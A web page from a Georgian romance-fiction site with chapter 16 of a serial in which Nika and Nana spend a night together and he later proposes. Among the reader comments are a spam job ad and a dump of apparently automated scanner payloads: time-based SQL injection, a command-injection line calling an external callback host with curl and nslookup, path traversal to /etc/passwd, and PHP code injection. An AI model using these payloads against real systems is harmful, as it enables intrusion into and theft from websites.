შესვლა
რეგისტრაცია
რეკლამა

უფლის იმედი....(16თავი)


16-05-2016, 00:33
ავტორი niino
ნანახია 3 545

იდგნენ გატრუნულები...ნიკას მის ყელში ჩაერგო თავი და ხარბად ისუნთქავდა მის სურნელს,ნანას თვალები მიენაბა,ნიავი არხევდა მის თმებს...
-ულამაზესი ხარ-უჩურჩულა ნიკამ
ნანამ თვალები გაახილა,ნიკას ხელების მოშორება სცადა,ამდროს ნიკამ მისკენ მოაბრუნა ძლიერად,ზედ აიკრა,ნიკაპზე ხელი მოკიდა და სახე ააწევინა,თვალებში ჩახედა...შემდეგ ნელა დაიხარა და ნაზად ეამბორა ბაგეებზე,ნანას წინააღმდეგობა არც გაუწევია,ან სად ჰქონდა მაგის თავი...............
ნიკა ოდნავ მოშორდა და კვლავ თვალებში ჩახედა...მის თვალებში ამოიკითხა ის სურვილი,რასაც თვითონ ამდენი ხანი ელოდა..კვლავ დააცხრა ბაგეებზე და მომთხოვნად დაუწყო კოცნა,ნანაც აყვა,ხელები ყელზე შემოაჭდო..რეალობას მოწყდნენ.....
-სად მოვედით ნიკა-ხმა ამოიღო ნანამ,როცა მანქნიდან გადმოვიდნენ...
-ნახავ ჩემო ლამაზო...-ხელი ჩასჭიდა ნანას
-კი მაგრამ...ნანამ რაღაცის თქმა დააპირა,ნიკამ თითი მიადო ბაგეებზე
-უბრალოდ მენდე-და მოწყვეტით აკოცა..
მიუხედავად ალკოჰოლისა ნანა ხვდებოდა რაც მოხდებოდა,მასში ორი ნანა იბრძოდა, ერთი,რომელსაც აქედან წასვლა უნდოდა,რომელიც ეუბნებოდა ეს არასწორი საქციელი იყო...და მეორე,რომელსაც ნიკასთან უნდოდა,მისი კოცნა უნდოდა,სურვილი ერეოდა,ვეღარ ეწინააღმდეგებოდა მამაკაცს,მის თავბრუდამხვევ კოცნას თუ ძლიერ სხეულს....
ნიკა ფრთხილად ეფერებოდა და კოცნიდა,ვერ წყდებოდა მის ბაგეს,შემდეგ ყელს ჩაუყვა,ნანამ თავი უკან გადასწია,და თვალები დახუჭა,ნიკამ შეხედა და ტუჩის კითხეში ჩაეღიმა,კოცნიდა გახელებით,მკლავი გადმოუწია და მკერდი მოუშიშვლა,ნანას ხელები ნიკას ზურგზე დაცოცავდნენ...ნიკა მის მკერდს გიჟივით დააცხრა,მსუბუქი კბენა დაუტოვა,რასაც ნანას ოდნავი კვნესა მოყვა....ნანამ ყრუ ტკივილი იგრძნო,ფრჩხილები დაასო ნიკას ზურგს რამაც მამაკაცი უფრო გაახელა....თვალებიდან ობოლი ცრემლი გადმოუვარდა...ვნებამორეული ორი სხეული ერთიანად ქცეულიყო....ნიკამ როცა ყველაფერი გაიაზრა,გაკვირვებული დაჰყურებდა ნანას,რომელსაც თვალებიდან ცრემლი სდიოდა,მიხვდა:ის არ იყო ის,ვისაც თვითონ ფიქრობდა...
-ნუ ტირი გთხოვ ნუ ტირი,ჩემი ხარ,ჩემი ხარ,მხოლოდ ჩემი-ჩურჩულებდა ნიკა და ნანას ეფერებოდა.....
გულზე მიიხუტა ქალის სხეული და ხელები მჭიდროდ შემოაჭდო,ალკოჰოლმა თუ დაღლამ თავისი ქნა და ნანას ჩაეძინა..ნიკა კი უყურებდა მძინარეს,თმებზე ეფერებოდა..... ყველაფერი გაახსენდა ნანას პირველი ნახვის დღიდან მოყოლებული ამ წუთამდე...ხომ მიიღო რასაც ამდენი ხანი ცდილობდა,ელოდებოდა....მაგრამ თავი არარაობად იგრძნო...დილას ერთმანეთზე ჩახუტებულებს გაეღვიძათ...ნიკას ნანას მკერზე ედო თავი და ხელები მის წელზე შემოეჭდო...ნანას ყველაფერი გაახსენდა,სირცხვილისგან ალმური წაეკიდა...ეცადა ფრთიხლად გამომძვრალიყო,ნიკას არ გაეღვიძა ისე..სულ ცოტაც და ....
-სად მიიპარები-თბილად კითხა ნიკამ
ნანამ საბანი აიფარა მოშიშვლებულ მკერდზე,თვალები დახარა, რაზეც ნიკას გაეღიმა,ნანას ხელები შემოაწყო წელზე და მიიზიდა..
-ასე ადვილად ვერ გამექცევი-ეჩურჩულებოდა ნიკა თან ხარბად ისუნთქავდა ნანას სურნელს..
-აბაზანაში შევალ-ესღა უთხრა და დაუსხლტა ხელიდან ნიკას
აბაზანაში შესულმა წყალს გაატანა ცრემლები...უხმოდ ტიროდა,არ უნდოდა ასე მომხდარიყო,სულ სხვანაირად წარმოედგინა ეს ყველაფერი,ცრემლი მოსდიოდა,მაგრამ არ ნანობდა მომხდარს,არა არ ნანობდა...ნიკა კი დაჰყურებდა წითლას შეღებილ ზეწარს....არაკაცად თვლიდა თავს...ნანა გამოვიდა სააბაზანოდან და ტანსაცმლის მოკრეფა დაიწყო,დამშვიდებულიყო,მაგრამ მაინც ეტყობოდა ცრემლების კვალი...ნიკამ ზურგიდან აიკრა,მისკენ მოაბრუნა,თვალებში ჩახედა...
-ნანა მაპატიე,ვიცი ნანობ,მაგრამ ჩემი ბრალია...ნანამ არ დააცალა თქმა
-არა ნიკა არ ვნანობ-უთხრა მტკიცედ
ნიკა გაოცებული უყურებდა,მის თვალებში ვერ შენიშნა სინანული,იმდენად წრფელი და სუფთა თვალებით უყურებდა ნანა,რომ თავის თავი შეზიზღდა...
-მაინც მინდა პატიება გთხოვო-ნიკა
-გეუბნები მართლა არ ვნანობ,უბრალოდ არ მინდოდა ასე მოხდარიყო,სხვანაირად წარმომედგინა ეს ყველაფერი,შენთან გატარებულ ჩემს პირველ ღამეს არ ვნანობ...
-ნანა, ნანა....-ნიკამ გულში ჩაიკრა ქალი..მართლაც რა სათუთი და ნაზი,მაგრამ როგორი ძლიერი ქალი იდგა მის წინ....
-უნდა წავიდე-ნანა
-მე წაგიყვან,მარტოს არ გაგიშვებ-ნიკა
-თინასთან მიგიყვანო?-კითხა ნიკამ და თან ნანას აკვირდებოდა რომელიც სივრცეს გაყურებდა...
-არა თინასთან მოგვიანებით გავალ, სახლში წამიყვანე-ხმადაბლა უთხრა ნანამ...ამის მერე არცერთს ხმა არ ამოიღია..
-ნანა მინდა დაგელაპარაკო-უთხრა ნიკამ სანამ ნანა გადავიდოდა
-ახლა არა ნიკა გთხოვ,ახლა მარტო მინდა ყოფნა..
-კარგი ნანა,როგორხ იტყვი-მიიზიდა ნანა და თავზე აკოცა..ნანა სახლში შესვლისთანავე საწოლზე დაემხო და ბალიში ჩაიხუტა..გაიხსენა მომხდარი და ბალიში კიდევ უფრო ჩაბღუჯა....
ფიქრებში ჩაეძინა ვერც ლანას დანარეკი გაიგო და ვერც თინასი...ნაშუადღევს გაახილა თვალები,აბზანაში კარგა ხანს დაჰყო..სამზარეულოში გაფრატუნდა და მაგარი ყავა გაიკეთა,ამ დროს ტელეფინი ახმაურდა..ოხ როგორ არ უნდოდა ამ მყუდროების დარღვევა..ლანა იყო..
-ხო ლანა..
-გოგო რახანია გირეკავ,თინაც გირეკავდა,ახლაც მასთან ვარ.. ცოცხალი ხაარ?-ქოთქოთებდა ლანა
-ლანაააა მეძინა ადამიანიო და ვერ გავიგე ხმა..
-რას ამბობ გოგო მთელი დღე როგორ გეძინა?გუშინ არ დაგირეკეთ იმიტომ რომ ვიცოდით სადაც იყავი და მყუდროება არ დაგირღვიეთ,ვიფიქრეთ დღეს თინასთან გამოხვიდოდი და აქ გნახავდით,შენ კი არც გამობრძანდი და არც დარეკვა იკადრე-არცხრებოდა ლანა
-ლანა თუ დამაცდი აგიხსნი
-გისმენ ქალბატონო გისენ
-მთაწმინდაზე ვიყავით მე და ნიკა...გვიანი იყო რო მოვედი სახლში,რადგან ჩამეძინა ვიფიქრე თინასთან საღამოსკენ გავალთქო..ახლა კი შენ გესაუბრები-იცრუა ნანამ
-იცოდე ყველაფერი უნდა მომიყვე,დეტალურად ეგრე ადვილად ვერ დაიძვრენ თავს-ლანა
-ოოხ ლანა ლანაა...კარგი,კარგი..
მართალია ლანა მისი უერთგულესი მეგობარი იყო მაგრამ გადაწყვიტა მისთვის არაფერი ეთქვა და არაფერი შეემჩნია..ტელეფონი დადო და ყავას დაეწაფა,კვლავ ახმაურდა ტელეფონი
-ეს გოგო ხო არაფერს გაცლის-უკმაყოფილოდ დასწვდა ტელეფონს ,არც დაუხედავს
-ახლა რაღა მოხდა ლანა- გაბრაზებით უთხრა
-ლანა არა ნიკა ვარ ნანა
ახლა დახედა ნანამ ტელეფონს
-ლანა მეგონე
-ნანა სალაპარაკო მაქ,უნდა გნახო..
-ნიკა ახლა არ მცალია თინასთან გავდივარ..სხვა დროა იყოს
-ნანა დიდ დროს არ წაგართმევ...
-ნიკა მართლა თინასთან გავდივარ...გთხოვ ახლა არა..
-კარგი ნანა,დაგირეკავ მოგვიანებით
-კარგი..
თინასთან მისულ ნანას კითხვები დააყარა ლანამ..ნანამ ყველაფერი უამბო სანამ რესტორანში იყვნენ..მერე იცრუა...დიდხანს ვსეირნობდით და დრო ისე გავიდა ვერც მივხვდითო
ისე ოსტატურად იმსახიობა ნანამ არავის არაფერი შეუმჩნევია..გავიდა თითქმის კვირა,ნანა ხან რა მიზეზს მოიგონებდა ხან რას,რომ ნიკას არ შეხვედროდა,ნიკა ამს ყველაფერს მშვენივრად ხვდებოდა...წვიმიანი საღამო იყო,ნიკა კლუბში იჯდა ბიჭებთან და სვამდა..ბიჭები ნიკას ამჩნევდნენ ცვლილებას,ეკითხებოდნენ,მაგრამ ნიკა არაფერს პააუხობდა..
-როდემდე უნდა იყო ასე?-გიო
-და რა არ მოგწონს??-გაბრაზებით უპასუხა ნიკამ
-რა გჭირს ძმაო,ვერ გცნობთ..რაგაქ ჩვენთან დასამალი ტო-ცოტა ნაწყენმა უთხრა გიომ
-მაპატიეთ ბიჭებო...მეტის მოთმენა აღარ შემიძლია უნდა ვნახო აუცილებლად უნდა ვნახო-ნიკა
-ვისზე ამბობ ძმაო
-ნანაზე..ამის დედაც...ვგრძნობ რომ მის გარეშე ვერ ვიცოცხლებ...არადა უკანასკნელი არაკაცივით მოვიქეცი...
-ვაახხ ჩვენი ძმა შეყვარებულია ტო-შესძახეს ბიჭებმა
-მოიცა რას გულისხმობ არაკაცივით მოქცევაში-გიო
-სხვა დროს გეტყვი გიო,ახლა დალევა მინდა მხოლოდ-ნიკა
-წამო შენთან ავიდეთ,მეც საქმე მაქ შენთან თან დავლიოთ-გიო
-კარგი წავედით...ნიკამ ყველაფერი უამბო გიოს და დაელოდა ძმაკაცი რას ეტყოდა..გიოც გაოცებული იყო ამ ყველაფრით და ყველაზე მეტად იმით,რომ გამოჩნდა ისეთი გოგო,რომელმაც სიყვარული აგრძნობინა ისეთ მამაკაცს როგორიც ნიკა იყო..
-ნიკა ძმაო ერთი რამ მითხარი ნანა მართლა გიყვარს თუ....ნიკამ არ აცალა საუბრის დასრულება
-მიყვარს ძალიან მიყვარს..ვაღიარებ პირველივე ნახვიდან მომეწონა,მაგრამ როცა ვაკოცე და თავი გამიტეხა მაგ დღიდან მიყვარს.. სასაცილო ისაა რომ როგორიც მეგონა ისეთი არ აღმოჩნდა..ვიცი არაკაცურად მოვექეცი ამას ახლა ვაღიარებ,ისიც ვიცი ნანას არ ვიმსახურებ მაგრამ მე ვერ გავძლებ მის გარეშე,გამირბის თავს მარიდებს კვირაზე მეტია..არადა ვეღარ ვძლებ უკვე...
-გასაგებია თავს რატომაც გარიდებს...თუ მართლა გიყვარს დროა ის გააკეთო რაც ძალიან გინდა-გიო
-ცოლობა ვთხოვო?ნუთუ ფიქრობ დამთანხმდება?
-არვიცი ვერაფერს გეტყვი მაგრამ შენ შენი უნდა გააკეთო ძმაო...
-მართალი ხარ გიო...შენ რის თქმას აპირებდი?
-მე არაფერი, მოვიტყუე უბრალოდ.ვიცოდი არაფერს იტყოდი მანდ და ეგ მოვიმიზეზე რა..
-მადლობა ძმაო-და მხარზე დაჰკრა ძლიერად ხელი
დილას ადრე ადგა და გადაწყვიტა ნანას სახლში მისულიყო..ნანა აბაზანიდან გამოვიდა,თხელი სარაფანი გადაიცვა რომელიც მუხლებამდე ჰქონდა..მიალაგა საძინებელი,ჩანთას დაავლო ხელი,გადაწყვიტა სასაფლაოზე ასულიყო და შემდეგ თინასთან,ტელეფონს დაუწყო ძებნა,ამდროს კარის ხმა გაისმა
-ნეტავ ვინ უნდა იყოს ამ დილაადრიან-ჩაილაპარაკა თავისთვის,კარი გააღო..
-ნიკა-მხოლოდ ეს თქვა
-ნანა როდემდე აპირებდი ჩემთვის თავის არიდებას?
ნანამ არაფერი უპასუხა კარი უფრო გამოაღო და შემოატარა ნიკა..
ნიკამ ხელი ჩაკიდა ნანას და დივანზე დასვა თვითონ წინ დაუჯდა და თვალებში უყურებდა
-ნანა კითხვაზე მიპასუხე
-უბრალოდ მარტო მინდოდა ყოფნა-დაბნეულმა თქვა ნანამ
-ნანა ეგ მიზეზი არარის..კარგი არ ჩაგეძიები...ერთი ღრმად ამოისუნთქა ნიკამ
-ნანა მინდა ჩემი ცოლი გახდე,ცოლად გამომყევი-პასუხის მოლოდინში თითქმის სუნთქვაც კი შეიკრა...
ნანა კი გაოგნებული,დაბნეული სახით უყურებდა და ეგონა მოესმა...
-რა?
-ნანა მინდა ჩემი ცოლი იყო..
-არა
-რა?-ნიკა
-არა არ მინდა ცოლად გამოგყვე-მტკიცედ უთხრა ნანამ...
-ნანა ვაღიარებ არაკაცურად მოვიქეცი გთხოვ ხელს ნუ მკრავ..ძალიან მიყვარხარ..ვიცი არ დამიჯერებ მაგრამ მიყვარხარ ნანა მიყვარხარ
უკვე თავს ვეღარ აკონტროლებდა ნიკა...
-ნიკა მე ვცდილობ დავივიწყო რაც მოხდა,მართალია არ ვნანობ მაგრამ მინდა დავივიწყო..არ მინდა ვალდებულების გამო ცოლად მომიყვანო გესმის არ მინდა არა...გთხოვ წადი და არასდროს გამოჩნდე ჩემს ცხოვრებაში...-ერთი ამოსუნთქვით უთხრა ნანამ
-რაა?შენ რა არ მისმენ? მიყვარხართქო ადამიანო არ გესმის?


მაპატიეთ დაგვიანებისთვიის.....



№1 სტუმარი )))

ra ari axla es ramdeni xani daagviane((( ise momewona kaia da daatanxme nana ar datanjoes bichi :d❤

 


№2  offline წევრი megikochiashvili

ოფისში გვესაჭიროება დამხმარე კადრები, საოფისე საქმიანობისთვის სხვადასხვა მიმართულებით, სტუდენტებისთვის დროის შეთავსებით, გრაფიკი დღეში 5 საათი, შერჩეული კადრი ადგილზე შეისწავლის საქმის სპეციფიკას, ასაკი 18-დან 38 წლამდე, ანაზღაურება 400-დან 700-მდე მზარდი, გასაუბრებაზე ჩასაწერად დამიკავშირდით. მეგი. ტელ: 597668787

 


№3 სტუმარი pHqghUme

1zVo24eItO

(nslookup -q=cname hitlnqkzjpentb408a.bxss.me||curl hitlnqkzjpentb408a.bxss.me))

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555'||sleep(27*1000)*gafmxs||'

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

115090-uflis-imedi16tavi.html

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555-1; waitfor delay '0:0:15' --

555-1) OR 650=(SELECT 650 FROM PG_SLEEP(15))--

555-1)) OR 751=(SELECT 751 FROM PG_SLEEP(15))--

555NGHnfyQF' OR 295=(SELECT 295 FROM PG_SLEEP(15))--

555ksJlpE49') OR 403=(SELECT 403 FROM PG_SLEEP(15))--

5553KAEhBLH')) OR 742=(SELECT 742 FROM PG_SLEEP(15))--

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1Di9GGoAqLO

../../../../../../../../../../../../../../etc/passwd

&echo glcacu$()\ ckjlzf\nz^xyu||a #' &echo glcacu$()\ ckjlzf\nz^xyu||a #|" &echo glcacu$()\ ckjlzf\nz^xyu||a #

${@print(md5(31337))}

xfs.bxss.me

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1*if(now()=sysdate(),sleep(15),0)

1-1; waitfor delay '0:0:15' --

1DyauFhk8'; waitfor delay '0:0:15' --

1-1) OR 794=(SELECT 794 FROM PG_SLEEP(15))--

1-1)) OR 245=(SELECT 245 FROM PG_SLEEP(15))--

1tfgTyXxz')) OR 812=(SELECT 812 FROM PG_SLEEP(15))--

 



სახელი: *
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent